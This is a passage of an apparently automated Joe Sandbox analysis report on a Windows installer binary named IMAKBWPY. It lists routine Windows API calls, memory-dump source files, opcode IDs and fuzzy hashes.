                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 2976181284-2967768451
                                                                                                                • Opcode ID: 91a4b8f4531e977f233641a7d77c73dfbff20362bb6d9b8a17ad185baa65e15d
                                                                                                                • Instruction ID: 8f15645f5d5e0a86b8d39d4a10e98de29b53f5de7f620b1f3c2cafeea87548d6
                                                                                                                • Opcode Fuzzy Hash: 91a4b8f4531e977f233641a7d77c73dfbff20362bb6d9b8a17ad185baa65e15d
                                                                                                                • Instruction Fuzzy Hash: B8F0A97660416DABDB218F86DC499AB7FA8EF04B60F014154BD54AB351E731DC10D7E0
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 009A3877
                                                                                                                • GetLastError.KERNEL32 ref: 009A3881
                                                                                                                • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 009A38EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1230559179-0
                                                                                                                • Opcode ID: 75854970dc61070646d875eb22833819472d2fc2a4ac318edb3a0a76715db202
                                                                                                                • Instruction ID: 499cf0d1df3985fe1416b8fc197ee794362704098be6874fa7c2318cecb784a1
                                                                                                                • Opcode Fuzzy Hash: 75854970dc61070646d875eb22833819472d2fc2a4ac318edb3a0a76715db202
                                                                                                                • Instruction Fuzzy Hash: 6721F5B2D0133DA7DB209B659C49F9B77AC9B82720F1141A5BE14EB241DA74DE4087D0
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,009A3BB6,00000000,?,009A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009A13B8), ref: 009A3A20
                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,009A3BB6,00000000,?,009A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009A13B8,000001C7,00000100), ref: 009A3A27
                                                                                                                • GetLastError.KERNEL32(?,009A3BB6,00000000,?,009A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009A13B8,000001C7,00000100,?), ref: 009A3A31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$ErrorFreeLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 406640338-0
                                                                                                                • Opcode ID: 8829a7d3d39cf2bea099ecf480a578d64e27882fc500b49887d8c5ef51796a01
                                                                                                                • Instruction ID: 7df61faa936e0390719f355c06653aa1ad2199269ee560d9bf16636d49ae3f1e
                                                                                                                • Opcode Fuzzy Hash: 8829a7d3d39cf2bea099ecf480a578d64e27882fc500b49887d8c5ef51796a01
                                                                                                                • Instruction Fuzzy Hash: 44D0C233A0813957832117E66C8C95B7E5CEF01AB27014020FE48DA220D721CC00A2E0
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open
                                                                                                                • String ID: regutil.cpp
                                                                                                                • API String ID: 71445658-955085611
                                                                                                                • Opcode ID: 17468f1ffd5dc5bf83303e078ef874b53aa1b5ed65b48a474fafa6f16dee0100
                                                                                                                • Instruction ID: fa841797351b429cc88aa188aba9ad1294f3b2fd1df870211a78e47557f4020b
                                                                                                                • Opcode Fuzzy Hash: 17468f1ffd5dc5bf83303e078ef874b53aa1b5ed65b48a474fafa6f16dee0100
                                                                                                                • Instruction Fuzzy Hash: E3F046336011B676CB3205978C01BABAE59EBC07B0F154E21BD86AA240E6A58C6096F0
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,009D90F4,?,00000000,?,00000000,?,009D911B,?,00000007,?,?,009D957D,?), ref: 009D51F6
                                                                                                                • GetLastError.KERNEL32(?,?,009D90F4,?,00000000,?,00000000,?,009D911B,?,00000007,?,?,009D957D,?,?), ref: 009D5208
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 485612231-0
                                                                                                                • Opcode ID: d80846ebd0fbc7305a502d7c5ab4cf296c5908acf7b665cbcfc66029e37e000b
                                                                                                                • Instruction ID: bb88e33d559b055c8c4bbc2d5da8bdefee72358c646225418d4d70fb3803c056
                                                                                                                • Opcode Fuzzy Hash: d80846ebd0fbc7305a502d7c5ab4cf296c5908acf7b665cbcfc66029e37e000b
                                                                                                                • Instruction Fuzzy Hash: C3E086315946446BCB112FA4AC49B4B3B989B40352F108115F618D5261D730998197A4
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 009E35F8
                                                                                                                  • Part of subcall function 009E304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,009E3609,00000000,?,00000000), ref: 009E3069
                                                                                                                  • Part of subcall function 009E304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,009CC025,?,009A5405,?,00000000,?), ref: 009E3075
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 52713655-0
                                                                                                                • Opcode ID: 4e730d10436207811b2e8e75c9d603bd3bb72574e1b621311ce37b2a14ea3019
                                                                                                                • Instruction ID: 226fd439e5844d1fb74392fad0c6458ce71488c11f8d9d57746c6b851a7d6a5e
                                                                                                                • Opcode Fuzzy Hash: 4e730d10436207811b2e8e75c9d603bd3bb72574e1b621311ce37b2a14ea3019
                                                                                                                • Instruction Fuzzy Hash: 7A315076E00269AFCB11DFA9C885ADEF7F8EF08710F01856AED15BB311D6319D008BA0
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(80070490,00000000,80070490,00A0AAA0,00000000,80070490,?,?,009B8B19,WiX\Burn,PackageCache,00000000,00A0AAA0,00000000,00000000,80070490), ref: 009E58CA
                                                                                                                  • Part of subcall function 009E10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009E112B
                                                                                                                  • Part of subcall function 009E10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 009E1163
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 1979452859-0
                                                                                                                • Opcode ID: 248d18e150dc5ea91cd9675818ae5a68972c708a58b5e8ca0936cbe5beef9611
                                                                                                                • Instruction ID: 79942e9cfacfb91818721189afeaa8f503c897a9100b94cd070e948e2b3781b5
                                                                                                                • Opcode Fuzzy Hash: 248d18e150dc5ea91cd9675818ae5a68972c708a58b5e8ca0936cbe5beef9611
                                                                                                                • Instruction Fuzzy Hash: A31186368006AEEFCB236E96C941AAEB76DEF44328B164179ED4167111C7314E50D7D1
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,009D1F87,?,0000015D,?,?,?,?,009D33E0,000000FF,00000000,?,?), ref: 009D524C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 1b65f3e1f6957169a31e46167b590e80a1f2f4d63d35f71eba6cbb171b6ed0aa
                                                                                                                • Instruction ID: 787b5f10c5bfe916a9320e6a5442a377fb509967fbb946ce6f24f6f9ea1fc20c
                                                                                                                • Opcode Fuzzy Hash: 1b65f3e1f6957169a31e46167b590e80a1f2f4d63d35f71eba6cbb171b6ed0aa
                                                                                                                • Instruction Fuzzy Hash: 1CE0E5315C59655BD62126655C05B5B374C9FB13A1F26C113AE31A7390CBA4DD0983A1
                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,009B8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 009A34D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e187bd9b849b7a14bc3bbb0ec7d007483d7747327ef1c4b243442f0a651e837a
                                                                                                                • Instruction ID: 3f50838b35af7ab8cb73ecbf7574c6d586b469d23b8658f2f672ef7726848a85
                                                                                                                • Opcode Fuzzy Hash: e187bd9b849b7a14bc3bbb0ec7d007483d7747327ef1c4b243442f0a651e837a
                                                                                                                • Instruction Fuzzy Hash: 6AE012723011287BE6022F655C05DEB7B9DDF4A354B108051BE40D6010D762D95096F0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009DBDAA: DeleteCriticalSection.KERNEL32(?,00A08130,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 009DBE0C
                                                                                                                • DeleteCriticalSection.KERNEL32(-00000020), ref: 009D7618
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalDeleteSection
                                                                                                                • String ID:
                                                                                                                • API String ID: 166494926-0
                                                                                                                • Opcode ID: 0a321812f7c4b63e9bc89164a91d87d9f0e1cab5523073b1e3e5919b219fd4cc
                                                                                                                • Instruction ID: e68bee041ffe7efc6f537b0743299b6914bf567deac7d101592184ed1742ef85
                                                                                                                • Opcode Fuzzy Hash: 0a321812f7c4b63e9bc89164a91d87d9f0e1cab5523073b1e3e5919b219fd4cc
                                                                                                                • Instruction Fuzzy Hash: E6E0DF328291148BC621BB98FE45B4973A8DF88320B024906F404933A1DB30AC428B65
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00000000,009A556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E2F0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 8bd5ea1536393968d6b779a59a892a17f751ecc488e36817ea91d3d830a74947
                                                                                                                • Instruction ID: 11f7e1e6695626867d9d5f03bd729b7631a9f1c494ab742ca7ec217635abe58a
                                                                                                                • Opcode Fuzzy Hash: 8bd5ea1536393968d6b779a59a892a17f751ecc488e36817ea91d3d830a74947
                                                                                                                • Instruction Fuzzy Hash: A5E0E3B193A26CDFCA00CFA9BE848427AACB609B50B04420BA800C2220C7B648439FB0
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 009DF491
                                                                                                                  • Part of subcall function 009E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009E9A09
                                                                                                                  • Part of subcall function 009E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009E9A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: b0987c932aa7b337191fb84871b4759c4f746ac4c0803aaa8b0b0268f3a89347
                                                                                                                • Instruction ID: 702e9ee03161c389a48f16834d9ee50daebf1a68a040df32a03b347724c31df8
                                                                                                                • Opcode Fuzzy Hash: b0987c932aa7b337191fb84871b4759c4f746ac4c0803aaa8b0b0268f3a89347
                                                                                                                • Instruction Fuzzy Hash: 90B012A13A95057DB24461153D17E37010CC2D9FA1330896FB041C11D1E8480C010136
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 009DF491
                                                                                                                  • Part of subcall function 009E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009E9A09
                                                                                                                  • Part of subcall function 009E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009E9A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: b6fd2f105418684084efde705de66023a83017a0828115a9c54f7de53e955641
                                                                                                                • Instruction ID: 83f06d282d2afd3c1730cd191202ffcff041c1ed0cf27ccb533b0fcf36c292a4
                                                                                                                • Opcode Fuzzy Hash: b6fd2f105418684084efde705de66023a83017a0828115a9c54f7de53e955641
                                                                                                                • Instruction Fuzzy Hash: 90B012A13A96057CB24461153C17D37010CC2D9FA1330CA6FF041C11D1E8540C400136
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 009DF491
                                                                                                                  • Part of subcall function 009E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009E9A09
                                                                                                                  • Part of subcall function 009E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009E9A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 943cdfdc4894bc946bd3158986d0cd62b911e34373152e5112cfb3537ca47197
                                                                                                                • Instruction ID: 35708c124ab177bccc588d0e41a00a3560d64f52440795b85a34bf68b8740e5a
                                                                                                                • Opcode Fuzzy Hash: 943cdfdc4894bc946bd3158986d0cd62b911e34373152e5112cfb3537ca47197
                                                                                                                • Instruction Fuzzy Hash: 79B012A53AA5057CB20421113C17C37010CC2D5FA1330CA6FB441C00D1E8440C000076
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 009E966B
                                                                                                                  • Part of subcall function 009E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009E9A09
                                                                                                                  • Part of subcall function 009E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009E9A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 172d78e659b88577739b400e2a025be1a80e3946ece9f5d096ee3b16fb54adda
                                                                                                                • Instruction ID: 7b128d80c1289ed5beebfdef95f907fabae10927a71d9f5d3e66d08db2da5f8f
                                                                                                                • Opcode Fuzzy Hash: 172d78e659b88577739b400e2a025be1a80e3946ece9f5d096ee3b16fb54adda
                                                                                                                • Instruction Fuzzy Hash: 84B012913683457CBA4562463E43D37010CC7C4F11330491FB414D10D2E8480C010236
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 009E966B
                                                                                                                  • Part of subcall function 009E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009E9A09
                                                                                                                  • Part of subcall function 009E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009E9A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: f35ce585ac37325490afb31b09457aa9ff84c318cee7750ee3e651c233a394f3
                                                                                                                • Instruction ID: adca2911b25d0c63f6d250c40a304f290848a13180195c9d3a471c724effa625
                                                                                                                • Opcode Fuzzy Hash: f35ce585ac37325490afb31b09457aa9ff84c318cee7750ee3e651c233a394f3
                                                                                                                • Instruction Fuzzy Hash: 28B012913683497CBA0522027C82C37010CD7C0F11330891FB410E00D2E8440C00033B
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 009E966B
                                                                                                                  • Part of subcall function 009E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009E9A09
                                                                                                                  • Part of subcall function 009E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009E9A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 890eba2e32dff7b76c5fcec98b987fca0f5484c49f560005720aee5087a378a2
                                                                                                                • Instruction ID: dcebb015e21ee6a4cbfcc8b1787dcd726eef1c25102ca6330940ede57e5c0768
                                                                                                                • Opcode Fuzzy Hash: 890eba2e32dff7b76c5fcec98b987fca0f5484c49f560005720aee5087a378a2
                                                                                                                • Instruction Fuzzy Hash: 6BB012913687467CB64562163C03D37010CC3C4F11330C91FB800C10D2E8440C040336
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,009A21A8,?,00000000,?,00000000,?,009A390C,00000000,?,00000104), ref: 009A14E8
